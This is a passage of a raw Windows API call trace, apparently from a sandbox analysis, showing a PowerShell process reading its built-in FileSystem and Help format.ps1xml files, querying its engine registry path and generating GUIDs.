	[0508.476] ReadFile (in: hFile=0x320, lpBuffer=0x2da07f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2da07f8*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.476] ReadFile (in: hFile=0x320, lpBuffer=0x2da07f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2da07f8*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.476] ReadFile (in: hFile=0x320, lpBuffer=0x2da07f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2da07f8*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.476] ReadFile (in: hFile=0x320, lpBuffer=0x2da07f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2da07f8*, lpNumberOfBytesRead=0x14d038*=0x119, lpOverlapped=0x0) returned 1
	[0508.476] ReadFile (in: hFile=0x320, lpBuffer=0x2da07f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2da07f8*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0508.477] CloseHandle (hObject=0x320) returned 1
	[0508.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0508.477] SetErrorMode (uMode=0x1) returned 0x1
	[0508.477] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cfe0 | out: lpFileInformation=0x14cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0508.477] SetErrorMode (uMode=0x1) returned 0x1
	[0508.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0508.477] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d0c8 | out: phkResult=0x14d0c8*=0x320) returned 0x0
	[0508.477] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d04c, lpData=0x0, lpcbData=0x14d048*=0x0 | out: lpType=0x14d04c*=0x1, lpData=0x0, lpcbData=0x14d048*=0x56) returned 0x0
	[0508.477] CoTaskMemAlloc (cb=0x5a) returned 0x3ce5c0
	[0508.477] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d01c, lpData=0x3ce5c0, lpcbData=0x14d018*=0x56 | out: lpType=0x14d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d018*=0x56) returned 0x0
	[0508.478] CoTaskMemFree (pv=0x3ce5c0) 
	[0508.478] RegCloseKey (hKey=0x320) returned 0x0
	[0508.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0508.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0508.478] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xff799603, Data2=0x1095, Data3=0x4514, Data4=([0]=0xba, [1]=0x6d, [2]=0x1e, [3]=0xc9, [4]=0x6d, [5]=0xa8, [6]=0xce, [7]=0xed))) returned 0x0
	[0508.479] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x40015313, Data2=0x24c2, Data3=0x4809, Data4=([0]=0xbb, [1]=0xc6, [2]=0xd1, [3]=0x68, [4]=0xb6, [5]=0x1d, [6]=0x4f, [7]=0xdd))) returned 0x0
	[0508.479] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x819e55aa, Data2=0x171e, Data3=0x4db6, Data4=([0]=0x97, [1]=0x7e, [2]=0x11, [3]=0x1a, [4]=0xad, [5]=0xba, [6]=0xbd, [7]=0x1a))) returned 0x0
	[0508.479] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xbcff3d3a, Data2=0xed25, Data3=0x4122, Data4=([0]=0xa6, [1]=0x20, [2]=0x15, [3]=0x51, [4]=0x52, [5]=0xbd, [6]=0x4, [7]=0x32))) returned 0x0
	[0508.479] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0508.479] GetFileType (hFile=0x320) returned 0x1
	[0508.479] SetErrorMode (uMode=0x1) returned 0x1
	[0508.479] GetFileType (hFile=0x320) returned 0x1
	[0508.479] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.480] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.480] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.481] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.481] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.481] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.481] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.481] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.482] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.482] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.482] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.483] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.483] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.483] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.483] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.483] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.485] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.485] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.485] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.485] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.485] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.486] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.486] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.486] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.486] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.486] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.487] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.487] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.487] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.487] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.488] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.488] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.490] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.490] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.490] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.490] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.491] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.491] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.491] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.491] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.492] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.492] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.492] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.492] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.492] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.492] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.492] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.493] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.493] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.493] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.493] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.493] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.493] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.493] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.494] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.494] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.494] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.494] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.494] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.494] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.494] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.495] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.495] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0xf37, lpOverlapped=0x0) returned 1
	[0508.495] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc037, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc037*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0508.495] ReadFile (in: hFile=0x320, lpBuffer=0x2dfc998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2dfc998*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0508.495] CloseHandle (hObject=0x320) returned 1
	[0508.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0508.495] SetErrorMode (uMode=0x1) returned 0x1
	[0508.495] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cfe0 | out: lpFileInformation=0x14cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0508.496] SetErrorMode (uMode=0x1) returned 0x1
	[0508.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0508.496] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d0c8 | out: phkResult=0x14d0c8*=0x320) returned 0x0
	[0508.496] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d04c, lpData=0x0, lpcbData=0x14d048*=0x0 | out: lpType=0x14d04c*=0x1, lpData=0x0, lpcbData=0x14d048*=0x56) returned 0x0
	[0508.496] CoTaskMemAlloc (cb=0x5a) returned 0x3ce5c0
	[0508.496] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d01c, lpData=0x3ce5c0, lpcbData=0x14d018*=0x56 | out: lpType=0x14d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d018*=0x56) returned 0x0
	[0508.496] CoTaskMemFree (pv=0x3ce5c0) 
	[0508.496] RegCloseKey (hKey=0x320) returned 0x0
	[0508.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0508.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0509.281] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xc0641bea, Data2=0x4d6d, Data3=0x4efe, Data4=([0]=0xb1, [1]=0xa0, [2]=0xbe, [3]=0x3f, [4]=0xc3, [5]=0x5f, [6]=0x87, [7]=0xbe))) returned 0x0
	[0509.282] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x7f88a188, Data2=0x1d84, Data3=0x4ea3, Data4=([0]=0x99, [1]=0xe2, [2]=0x27, [3]=0x77, [4]=0x8c, [5]=0xaa, [6]=0x54, [7]=0xab))) returned 0x0
